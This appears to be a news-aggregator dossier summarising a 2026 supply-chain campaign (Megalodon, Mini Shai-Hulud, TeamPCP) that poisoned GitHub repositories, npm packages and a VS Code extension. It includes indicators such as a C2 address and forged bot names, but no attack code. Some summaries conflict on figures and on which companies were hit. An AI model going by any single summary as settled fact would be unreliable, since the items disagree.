Loading...
Loading...
A rapid, automated supply‑chain campaign—blended into reports as Megalodon, Mini Shai‑Hulud and TeamPCP activity—has poisoned thousands of open‑source projects across GitHub and npm. Attackers used trojanized VS Code extensions, compromised maintainer accounts and forged CI commits to publish backdoored packages, inject malicious GitHub Actions workflows, and exfiltrate credentials from developer endpoints and CI. The wave includes hundreds of malicious npm releases, thousands of backdoored repos, and a GitHub internal breach of ~3,800 repositories. The crisis exposes weak verifier models (Sigstore/CI), insecure developer tooling, and lax credential hygiene, driving calls for MFA, dependency pinning, stricter CI governance, staged publishing and broader supply‑chain scanning.
The campaign demonstrates how developer tooling and CI can be weaponized to corrupt vast open-source supply chains, raising systemic risk for software projects and cloud deployments. Tech professionals must reassess dependency trust, CI controls, and credential hygiene to limit propagation and impact.
Dossier last updated: 2026-05-23 12:39:58
Security researchers uncovered the “Megalodon” campaign that backdoored more than 5,000 GitHub repositories by abusing GitHub Actions workflows. Attackers used throwaway or compromised accounts and weak branch protections to inject malicious CI steps that download and run infostealer malware from external URLs, turning supply-chain automation into a mass distribution vector. OX Security and SafeDep led analysis, highlighting how automated CI/CD environments, token permissions, and insufficient repository safeguards allowed rapid propagation. The incident matters because it shows how modern development workflows and ephemeral contributor accounts can be weaponized to exfiltrate secrets and compromise developer and enterprise infrastructure, prompting urgent need for stricter branch policies, least-privilege tokens, and CI workflow auditing.
Security researchers disclosed a supply-chain campaign called “Megaladon” that has compromised over 5,500 GitHub repositories by injecting malicious code into open-source projects and package manifests. The campaign leverages compromised accounts, credential stuffing, and repo takeover to introduce backdoors and typosquatted dependencies, enabling downstream supply-chain contamination across npm, PyPI and other ecosystems. Major risks include silent propagation to downstream projects, automated CI/CD workflows pulling poisoned packages, and credential exposure via leaked tokens. This matters because it undermines open-source trust, threatens millions of users/deployments relying on affected libraries, and highlights gaps in repository access controls, dependency verification, and package registry protections. Mitigations include rotating credentials, enforcing 2FA, dependency pinning and supply-chain scanning.
Security researchers disclosed a large-scale supply-chain attack on GitHub, dubbed "Megalodon," that compromised over 5,500 repositories by injecting malicious code into open-source packages and projects. The campaign exploited compromised accounts and package publishing workflows to push backdoored updates that could exfiltrate credentials or run arbitrary commands. Affected projects span multiple languages and ecosystems, increasing risk for downstream users and dependent software. GitHub and maintainers are urged to rotate credentials, audit recent commits and package releases, and enforce multi-factor authentication and signed commits/packages. The incident highlights persistent threats to the software supply chain and the need for stronger repository hygiene, dependency monitoring, and platform-level protections.
On May 18–19 attackers used stolen maintainer credentials to publish hundreds of malicious npm package versions that passed Sigstore provenance checks because the adversary could obtain valid signing certificates. The Mini Shai-Hulud campaign (attributed to TeamPCP) and a separate compromise of the Nx Console VS Code extension led to thousands of installs and harvesting of cloud credentials, tokens, and 1Password vaults. Researchers from Endor Labs, Socket, StepSecurity, Adversa AI, Johns Hopkins, Microsoft MSRC and others say the developer-tool verification model is broken: CI, Sigstore, IDE/extension credential storage, agent frameworks, and AI coding CLIs all expose attack surfaces. Notably, TrustFall showed AI coding CLIs auto-execute project MCP servers with full privileges, enabling secret exfiltration and supply-chain propagation.
A cybercriminal group called TeamPCP has escalated software supply-chain attacks into a persistent campaign, recently breaching GitHub after a developer installed a malicious VSCode extension and claiming access to roughly 3,800–4,000 internal repositories. Security firms say TeamPCP has executed about 20 waves of attacks in months, tainting 500+ distinct open-source projects and using infected developer tools to steal credentials, publish malicious packages, and later extort victims. The group reportedly automates propagation with a self-spreading worm dubbed Mini Shai-Hulud that creates repositories with stolen encrypted credentials, accelerating a self-perpetuating “flywheel” of compromises across developer ecosystems. The spree heightens systemic risk for software supply chains and developer trust.
GitHub confirmed a major software supply-chain breach after attackers from the criminal group TeamPCP used a poisoned VSCode extension to access roughly 3,800–4,000 internal repositories and posted stolen source code for sale. Security firms say TeamPCP has run an unprecedented, sustained campaign—about 20 waves in recent months—tainting more than 500 distinct open-source packages and using planted malware to steal credentials, publish backdoored releases, and breach downstream companies including OpenAI and Mercor. Analysts warn TeamPCP automated much of the campaign with a self-spreading worm (Mini Shai-Hulud), creating a repeatable “flywheel” that amplifies supply-chain compromise risk across developer toolchains and critical software infrastructure.
Megalodon: Mass GitHub Repo Backdooring via CI Workflows
New guidance urges JavaScript developers to switch from npm to pnpm to reduce supply-chain risk and improve performance. The recommendation, highlighted in a blog post and shared on Reddit, argues pnpm’s strict node_modules layout, deterministic lockfile handling and stricter dependency resolution lower exploit surface and accidental package hoarding. It notes pnpm’s faster installs and disk-space savings as operational benefits, and warns that npm’s looser hoisting and flat dependency model can enable malicious packages and make attacks harder to contain. The piece matters because package manager choice affects millions of Node.js projects and can materially improve security posture and developer productivity with relatively low migration effort.
Mitchell Hashimoto, a longtime GitHub user, publicly announced he's leaving after repeated GitHub outages and reliability issues, amplifying wider developer discontent as major customers and OpenAI explore alternatives. Recent crises include a May 21st breach where a poisoned VS Code extension exposed credentials and led to 3,800+ internal repositories being compromised and offered for sale, plus a disclosed 0-day in Git infrastructure. Internal upheaval followed Microsoft reorganizing GitHub under CoreAI, removing the CEO role and triggering executive departures. Competition from Cursor and Claude Code, rising Copilot costs and unsustainable AI inference expenses, and migration projects to Azure that caused downtime have worsened trust. The story matters because GitHub's stability, security and business model affect the global developer ecosystem and Microsoft’s cloud margins.
A widely used JavaScript template package, art-template, was confirmed as the latest victim of a supply-chain attack on the npm ecosystem, where attackers have controlled the repository since 2025 and injected unauthorized remote JavaScript (including calls to Baidu Analytics). Developers and sysadmins raced to assess exposure across projects that pull dependencies via npm, which the article argues is the dominant vector for such incidents. Users quoted describe a sense of helplessness and point to weak maintainer account security as a root cause; the breach underscores ongoing risks in package-manager distributed dependencies and the need for stronger supply-chain practices. Upstream art-template documentation has been published with details.
On May 18, 2026, a campaign dubbed Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in six hours, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens and source code artifacts to a C2 at 216.126.225.129:8443. The attacker used throwaway accounts and forged identities (build-bot, auto-ci, ci-bot, pipeline-bot) and deployed two variants: a mass SysDiag workflow that triggers on push and pull_request_target, and a targeted Optimize-Build variant that replaces workflows and exposes a workflow_dispatch backdoor. The campaign also propagated via the npm package @tiledesk/tiledesk-server (v2.18.6–2.18.12). This matters because CI workflow compromise allows large-scale credential theft and cloud identity impersonation, threatening downstream supply chains and cloud environments.
GitHub is facing a crisis inside Microsoft after a wave of outages, a remote code execution vulnerability, and a supply-chain compromise that exposed internal repos, coinciding with leadership upheaval and a continuing talent exodus. After CEO Thomas Dohmke’s departure last summer, Microsoft folded GitHub under its CoreAI group led by Jay Parikh, who opted not to install a new GitHub CEO; that shift and poor internal morale reportedly accelerated departures and defections to startups like Entire. Competitive pressure is rising too: rivals such as Cursor and Anthropic’s Claude Code have narrowed GitHub Copilot’s lead, prompting Microsoft to reconsider acquisitions and reallocate developer resources to improve Copilot. The situation matters because GitHub’s stability, security, and ability to retain engineering talent are critical to the broader developer ecosystem and Microsoft’s AI tooling strategy.
Security researchers uncovered an automated campaign that injected malicious CI workflow commits into thousands of GitHub repositories: over 5,700 poisoned commits across 5,561 repos in about six hours. Attackers used throwaway accounts and forged commit authors (e.g., build-bot, auto-ci, ci-bot, pipeline-bot) with innocuous messages like "ci: add build optimization step" to insert backdoored GitHub Actions steps. The change could enable supply-chain compromise by running attacker-controlled code in downstream builds or leaking secrets. The campaign highlights risks in trusting external pull requests and the need for stricter CI governance, code-review policies, and repository protection to prevent automated backdoor propagation through developer tooling.
Runtime, a YC-backed startup (P26) founded by Gus and Carlos, launched an infra product that provisions sandboxed coding-agent environments so entire teams — including non-engineers — can use models like Claude Code, Codex, Copilot, Gemini and Devin safely. Engineering defines context, skills, and scoped integrations once; Runtime snapshots full running environments (Docker Compose, Kafka, Redis, seeded DBs) and orchestrates sandboxes across providers (E2B, Daytona, EC2, or self-hosted K8s). Secrets are proxied, and infra-level guardrails (command allow/deny, egress controls, RBAC) limit risk. Integrations include Slack, GitHub, PagerDuty, and Linear. Core is open source on GitHub, with a hosted SaaS offering and customers already in fintech and YC scaleups. This matters because it lowers the barrier to deploying agentic workflows while reducing security and operational friction.
GitHub links the breach of 3,800 internal repositories to the TanStack npm supply-chain attack, saying hackers used a malicious Nx Console VS Code extension (Sergiu Gatlan/BleepingComputer)
Sergiu Gatlan / BleepingComputer : GitHub links the breach of 3,800 internal repositories to the TanStack npm supply-chain attack, saying hackers used a malicious Nx Console VS Code extension — GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension …
GitHub disclosed that a developer’s VSCode extension was ‘poisoned’ in a supply-chain attack by a prolific hacker group called TeamPCP, which claims to have accessed roughly 4,000 GitHub repositories and advertised the company’s source code for sale. Security firms say TeamPCP has run at least 20 attack “waves” in recent months, tainting over 500 distinct open-source projects and compromising hundreds of downstream organizations, including AI company Anthropic and data firm Mercor. The group’s playbook inserts malware into widely used developer tools to harvest credentials, push malicious package versions, and then scale further—creating a self-reinforcing cycle of supply-chain compromise. The spree underscores growing systemic risk to software development ecosystems and the need for stronger supply-chain defenses.
GitHub confirmed that about 3,800 internal repositories were breached after an employee installed a trojanized VS Code extension; the malicious extension was removed and the compromised endpoint isolated during ongoing incident response. GitHub says the activity appears limited to internal repositories and there’s no current evidence of exposed customer data outside those repos. The cybercrime group TeamPCP claimed responsibility and is offering the purportedly stolen code for sale, and has been linked to prior supply-chain attacks targeting developer platforms. The incident highlights persistent risks from malicious editor extensions and supply-chain vectors that can expose sensitive corporate source code and developer credentials.
Staged publishing for npm packages
GitHub confirmed a breach via a malicious VS Code extension that compromised an employee device and exfiltrated internal repositories — roughly consistent with the attacker’s claim of ~3,800 repos. The incident highlights a wider, ongoing supply-chain campaign by groups like TeamPCP/UNC6780 that has targeted developer tooling (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, PyTorch Lightning) and npm accounts, pushing malicious packages that harvest tokens, keys, and secrets. The article warns that developer endpoints — laptops running trusted third-party binaries, extensions, and local AI agents — are high‑privilege, under-monitored perimeters; compromising their supply chain bypasses platform controls and can pivot into cloud and production environments. The piece calls for reassessing trust models around local developer tooling and tighter controls on agent/extension distribution and credentials.